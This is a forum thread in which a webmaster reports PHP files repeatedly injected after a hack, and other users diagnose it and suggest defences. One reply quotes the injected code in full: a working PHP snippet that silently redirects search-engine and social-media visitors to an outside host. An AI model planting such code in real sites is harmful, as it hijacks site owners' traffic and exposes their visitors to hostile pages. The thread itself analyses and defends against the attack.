1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

being hacked

Discussion in 'Web Hosting' started by fung1990, Jan 29, 2012.

  1. fung1990

    fung1990 Power Member

    Joined:
    Dec 21, 2009
    Messages:
    577
    Likes Received:
    51
    my webhosting hacked by some fuxking asshoo

    keep adding code to all my php file:

    i just clean it up and check it again, it shows again. about 24 hours.
    i think i got a backdoor on my hosting but i have too much file.

    need some help.
     
  2. __dark__

    __dark__ Registered Member

    Joined:
    Feb 15, 2010
    Messages:
    62
    Likes Received:
    24
    Code:
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"************") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
    header("Location: http://broadway.bee.pl/");
    exit();
    }
    }
    }
    }
    Hmm it seems it redirects all traffic coming from google,yahoo,facebook anything organic to his site, thats pretty smart
    Edit*

    As for what you can do is identify the backdoor, what can i tell you, downaload all the files and give them a quick scan or check if your hosting panel has an antivirus scan installed and do it from there, also finding the backdoor is half the job you have to identify the vulnerability that allowed the hacker to upload the shell, check for any forms that allow upload or plugins. My guess is that there exists a form that does not filter bad extensions, for exmple .php extensions
     
    Last edited: Jan 29, 2012
  3. fung1990

    fung1990 Power Member

    Joined:
    Dec 21, 2009
    Messages:
    577
    Likes Received:
    51
    i got some of his affiliate account.
    how can i report it by using this tricks?
     
  4. rulez05

    rulez05 Power Member

    Joined:
    Feb 3, 2011
    Messages:
    745
    Likes Received:
    142
    you have nulled script??

    Reading your problem I already have Headache good luck finding the backdoor XD
     
  5. popeh

    popeh Newbie

    Joined:
    Apr 22, 2009
    Messages:
    8
    Likes Received:
    1
    Little more information might be good, what script(s) are you running? What versions? Are they legit or nulled?
     
  6. HostStage

    HostStage Jr. VIP Jr. VIP Premium Member UnGagged Attendee

    Joined:
    May 20, 2010
    Messages:
    1,771
    Likes Received:
    1,730
    Occupation:
    BHW - CEO of Webhosting Company
    Location:
    BWH from France
    Home Page:
    I know where it could come from :

    1) Nulled Template / plugin

    2) Filezilla FTP client ( AVG was the only one if found to clean it for a web hosting customer)

    GL with that
     
  7. SicKk

    SicKk Newbie

    Joined:
    Jan 23, 2012
    Messages:
    19
    Likes Received:
    5
    take a look if you have any file with permissions like 777 and change to 644 and check if everything is working properly. take a look at the owner previlleges and which owner has the right to change files if you have more than one for your folder(s).

    good luck
     
  8. _Chip_

    _Chip_ Senior Member

    Joined:
    Jun 28, 2009
    Messages:
    847
    Likes Received:
    256
    Occupation:
    Student
    Location:
    Depends on my vpn
    its 100% theme related! your theme is backdoored. change theme!
     
  9. Maja92

    Maja92 Regular Member

    Joined:
    Jul 10, 2011
    Messages:
    319
    Likes Received:
    66
    Take _Chip_'s suggestion and also tell us what scripts/plugins you have running.
     
  10. OldSalt

    OldSalt Moderator Staff Member Moderator Jr. VIP Premium Member

    Joined:
    May 19, 2009
    Messages:
    1,279
    Likes Received:
    7,437
    Gender:
    Male
    Occupation:
    IT Sys Admin
    Location:
    US, East Coast
    Are you using a plugin of some sort that allows you to submit php scripts to be executed that you could turn off? Just wondering... cause he/she is obviously entering the change and having your existing scripts execute them... it's either injecting them into a vulnerability or there is a way to execute the external script that is entered into a comment box.

    That's one of the reasons why I don't like allowing php to be executed even in the admin windows...
     
  11. Dax0r

    Dax0r Registered Member

    Joined:
    Jan 25, 2012
    Messages:
    66
    Likes Received:
    5
    This backdoor is interesting...
     
  12. fung1990

    fung1990 Power Member

    Joined:
    Dec 21, 2009
    Messages:
    577
    Likes Received:
    51
    i am running couple script, mostly wordpress.
    still looking for the backdoor.